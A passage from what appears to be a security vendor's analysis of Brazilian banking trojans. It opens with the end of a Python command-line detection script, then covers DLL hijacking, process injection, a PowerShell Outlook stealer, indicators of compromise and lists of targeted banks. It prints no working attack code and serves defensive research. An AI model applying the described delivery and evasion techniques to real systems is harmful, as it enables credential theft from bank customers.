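     "cmdline": r"certutil -verify C:\certs\server.cer"},
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["cmdline"], "=>", finding)
```

The stdin rule is the one to pair with the environment-variable section: it cannot name the payload, so the alert deliberately sends the analyst to the parent cmd.exe command line and the process environment block, which is where the page shows the downloader ends up.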


Example #2: Rundll32 injecting Main Payload to Windows Media Player

In this example, we follow the execution starting from the second stage PowerShell downloader.

The network PCAP shows the second stage PowerShell downloading a ZIP file (PK signature). The ZIP contains OAzBrxSXRoTOBssa.dll and OAzBrxSXRoTOBssa.

List of dropped files:

File Name | Purpose | SHA-1
1010180844353.bmp | ZIP archive (dropped by PowerShell) | 3344EF3B32DF03057721ED6E76F276B9073A0932
OAzBrxSXRoTOBssa.dll | Malware loader; exported function dGuCCzlxnosaJBpk | C523C65C7BD9EE09360C24BC706985BA5361D724
OAzBrxSXRoTOBssa | Encrypted payload | 1A86E3D82AF58DA6A3CC5B3849B7D81565945433

The PowerShell script extracts the archive's contents and runs the DLL via rundll32.exe, pointing it at the exported function "dGuCCzlxnosaJBpk".

Once the loader decrypts the main payload (OAzBrxSXRoTOBssa), it injects the malicious code into Windows Media Player. The injected PE, whose "MZP" header marks it as a Delphi-built binary, is mapped into the memory space of Windows Media Player.

The dumped payload shows indications that the malware was likely compiled on a machine with Brazilian Portuguese language settings, as can be seen in its RC_DATA resource section.

Once executed, the malware sends an initial beacon via a POST request to the command-and-control server.

Related Post-Infection Payloads: Outlook Malware & InfoStealers

Other Brazilian malware related to the families we analyzed was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, show what the threat actors are after.

In addition to the banking Trojans, we found the same campaigns distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. The Outlook malware is a particular concern, since it poses a risk to organizations worldwide: it uses Outlook's own functions, for example to query the victim's contact list. Threat actors usually use this information for spam campaigns, but can also sell it on underground markets to other attackers who want information on an organization they plan to attack.

Distribution of Additional Malware

The following is an example of malware designed to steal credentials using overlay phishing as well as to download additional malware. The malware and its auxiliary components were found in %programdata%:

File Name | Purpose | SHA-1
Rltkapo32.exe | Renamed authentic Microsoft certmgr.exe | F18EEBAEA4460B057F5B49E8239779F1C0C05BB9
Cryptui.dll | Fake DLL, serves as loader and injector | D3AE2843261528D8B4A5D6070661FE302E7A1FA9
Rltkapo32.driver | Main payload | 036B68413E64BE54A919916A7360B2B4142E59D0
Borlndmm.dll | Legitimate Borland Delphi memory manager library | 76E3A2004E5BA7F5126FAC9922336F38E928D733

As seen before, Brazilian threat actors often exploit DLL hijacking, and this time the vulnerable application was Windows' certmgr.exe (the Certificate Manager tool). The fake DLL (cryptui.dll) loaded the main malware payload (Rltkapo32.driver) and injected it into svchost.exe.

Renamed Windows certmgr.exe loading a fake DLL

Examination of the payload injected into svchost.exe shows that the Delphi malware presents a fake login form to its victims in order to steal their credentials (possibly even organizational credentials).

The injected svchost.exe process communicates with the C2 servers and downloads a second payload:

Mathilde.exe (SHA-1: 15166EF05CB3278E388C46359835A64CFB4D29EC)

Mathilde.exe is a self-extracting (SFX) archive that extracts a script called "linsoldo.cmd", a PowerShell downloader (SHA-1: CDE80C9D1875C97BAB89778B60E33AE30887D2E4).

The script fetches an Outlook stealer PowerShell script hosted on an Amazon S3 bucket.

Outlook PowerShell Stealer

The downloaded PowerShell script ("Outpos.data") is designed to steal information from Microsoft Outlook clients and harvest users' email addresses. Its main capabilities:

  • Receive encoded commands from the C&C server
  • Gather information from Outlook (contact list, mailboxes, emails, Outlook folders)
  • Write collected data to a .txt file in the %temp% folder
  • Post data to the C&C server over HTTP

An excerpt from the PowerShell script shows the data being exfiltrated; also of interest are the comments in Portuguese left by the malware's author.

The data is posted to a server running XAMPP. An error page on that server exposes an admin panel referencing the name "coringa".

"Coringa" is likely a reference to a Brazilian RAT called "Coringa-RAT", whose source code is publicly available. It is likely that the threat actors are using the RAT in other campaigns as well. Cybereason, however, did not observe direct use of Coringa-RAT in the aforementioned campaigns.

Coringa-RAT panel

Contents of Amazon S3 Bucket

The URL from which the Outlook malware was downloaded points to an Amazon S3 bucket:

S3 bucket URL: hxxps://s3-eu-west-1[.]amazonaws[.]com/teste34s2/

The bucket contains several kinds of Brazilian malware: second stage downloaders, the Outlook mail stealer and a Brazilian banking Trojan (Remote Overlay RAT):

File Name | Purpose | SHA-1
outpos.data | Outlook mail stealer (PowerShell script) | 0657FAA51EB8417A2D63388A9BA37997A2B5F323
image2.png | ZIP file containing a vulnerable NVIDIA binary and Brazilian financial malware (contents listed below) | -
bol.png | PowerShell downloader | 16FAEF11D46CFBCAFE8B58064C2C38B96950BE9C
Poratal.txt / Testefad.txt | PowerShell downloader | E138609B66FC6B9C6C688DE6B5DC094A782C6474
jardilhas.mcas | PowerShell downloader | 0C2CD86F1838A48E2B71430D3314182CC2318914
Cadeagod.maz | PowerShell downloader | C80AD41891EFE21798CC8F04B73CC64F4D883EA1
jasonfsa.vom | PowerShell downloader | 174FF790DBFB5053755D5164B26CA90F1A4D7CB8
juremal4l3l.dfas | PowerShell downloader | D89AEFC78440710DDF0CFC91FF3BB590FF7D1C4F
mortlin.sdo | PowerShell downloader | 9BDB62C5871E45AF57F4D9A1D94C446627FC2ECF

Contents of image2.png (ZIP):
Nvsttest.exe: legitimate NVIDIA application
_.dll: loader and injector
_.prx: malware payload

The unpacked payload of the Remote Overlay RAT (SHA-1: A97B6D83589DA0ACD60E87EA9B29B84516DF7E52) shows that the malware targets Brazilian banks such as Citibank Brasil, Safra National Bank, Banco da Amazonia, Itau Brasil and Bradesco.

Brazilian-made Malware, Spanish-Speaking Targets

Cybereason analyzed multiple infections involving different Brazilian financial malware that did not target Brazilian bank users. Instead, the malware configuration was set to target bank users in Latin America and Spain. This finding is consistent with earlier research papers that discuss various aspects of Brazilian cybercrime's role in the global threat landscape and its spread to other regions; research from ESET, Trend Micro, Kaspersky and ElevenPaths has more details on that topic.

The following examples, taken from infections that occurred in 2018, show that online banking users in Spanish-speaking countries are also being targeted. These countries include Argentina, Bolivia, Chile, Venezuela and Spain. Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries.

Example #1: Brazilian Financial Malware targeting bank customers in Latin America and Spain

  • Brazilian Banks:
Banco do Brasil, Santander, Itau Unibanco, Banco Bradesco, Sicredi, Unicred do Brasil, Sicoob, Banco Inter, Banco do Nordeste, Banco Mercantil do Brasil, Caixa Economica Federal
  • Bolivian Banks:
Banco Mercantil Santa Cruz (BMSC), Banco Union, Banco Nacional de Bolivia (BNB), Banco Bisa, Banco de Crédito de Bolivia (BCP), Banco Fassil, Banco FIE, BancoSol, Banco Ganadero and Baneco
  • Chilean Banks:
Itaú CorpBanca, Scotiabank Azul (BBVA), Banco Falabella, Banco Edwards, Banco Ripley, Banco de Crédito e Inversiones (BCI), Banefe (Santander), Scotiabank, Banco Industrial y de Comercio Exterior (BICE), Banco Internacional and Banco Consorcio
  • Spanish Banks:
Bankia, Sabadell, Bankinter, Ibercaja, Liberbank, Abanca, Kutxabank, Unicaja, Santander, Banco Bilbao Vizcaya Argentaria (BBVA) and CaixaBank

Example #2: Brazilian Spammer / Info-Stealer targeting Venezuela & Bolivia

(SHA-1: BAAD23A6A7644FDCC1B24D43294D04E001BA328B)

Venezuelan Banks:

Bancaribe, Banco Fondo Común (BFC), Banco Exterior, Banco Sofitasa, BBVA Provincial, Banco Universal, Banco Industrial de Venezuela, Banesco Banco Universal, Banco Caroní, Banco Venezolano de Crédito, Banco Nacional de Crédito, El Banco Federal

Example #3: Brazilian Banker Targeting Argentinian Users

An image extracted from the malware’s resources shows an overlay screen meant to bypass multi-factor authentication, targeting customers of Bank of Patagonia:

(Sample SHA-1: 92746D90584A17C25BB6B6D3A095A7A3FBE46D0E)

List of Argentinian banks targeted by the Brazilian malware:

Argentinian Banks:

Banco Patagonia, Itaú Argentina, Standard Bank Argentina, Banco Macro, Industrial and Commercial Bank of China (Argentina), Santander Rio

Brazilian-Made Malware, Originally made to target Brazilian Users

During our investigation, it was evident that the different malware types were created by Portuguese-speaking authors and were originally designed to target Brazilian users. This is supported by the embedded Portuguese strings and by references to specific security software distributed by Brazilian banks, as can be seen below:

Command & Control instructions in Portuguese:

(Sample SHA-1: 2058F993785B3669A4143D563A6E238A8E12C524)

List of commands embedded in the malware’s code shows Portuguese strings:

Excerpt from UAC-bypass procedure used by the malware (“not possible to verify UAC”):

Strings referencing specific software distributed by Brazilian banks to enhance online banking safety, such as G-buster Plugin (GbPlugin), Aplicativo Bradesco and Aplicativo Itau:


Back to the Source: Open-Source RAT, Many Variants

Based on functionality and string similarity, Cybereason estimates that different kinds of Brazilian malware borrowed code from, or were even based on, the source code of a Remote Access Tool (RAT) called “Delphi Remote Access PC”. The RAT is open-source and publicly available on Github. It was coded in 2015 by a Brazilian user whose Internet handle is “senjaxus”. This user also co-coded another RAT called AllaKore. The author clearly states that he is not responsible for any misuse of his code:

Translated from Portuguese:

“This source was created by Richard Maickonn. Distribution of this source is free! Contact: senjaxus[at]gmail.com.”


Even though the code has fully functional remote access capabilities, it does not seem to contain functionality directly related to financial malware, namely the targeting of banks or the use of screen-overlay social engineering. In addition, unlike typical Brazilian financial malware, the Github source code does not contain anti-analysis code, such as the ability to detect virtual machines, security products or Brazilian banking software. It is our estimation that these features were likely added by different malware authors who repurposed the open-source RAT code.

Examples of code similarity between the Github source code and other Brazilian malware payloads:

(Sample SHA-1: BCFCECF791C47A844D07E870F58266FE0F28F0DE)

Example #2: Brazilian malware targeting Chilean Bank Users

(Sample SHA-1: 56B235985199D0DBAF8EA75B6704AF2841CB50D7)

Example #3: MPRado Remote Access Tool

This RAT appears to be heavily based on the source code of Delphi Remote Access PC and is likely a variant of it:

(Sample SHA-1: 5B8DF646C2AE5EE9CD11B598FA0631AF41578C97)


In this blog, we surveyed the techniques used by Brazilian threat actors as observed by Cybereason throughout 2017-2018. We also showed how different financial malware campaigns share similar traits around delivery methods. The analysis of the tools and techniques highlights how effective these methods are at evading antivirus products, as demonstrated repeatedly by the low detection rate. In addition, we showed how Brazilian threat actors are expanding their campaigns and targeting online banking users across Latin American countries as well as Spain. Finally, we linked several payloads to an open-source RAT that was created by a Brazilian author whose code was likely repurposed and turned into various banking trojans by Brazilian threat actors.

Indicators of Compromise

IP addresses
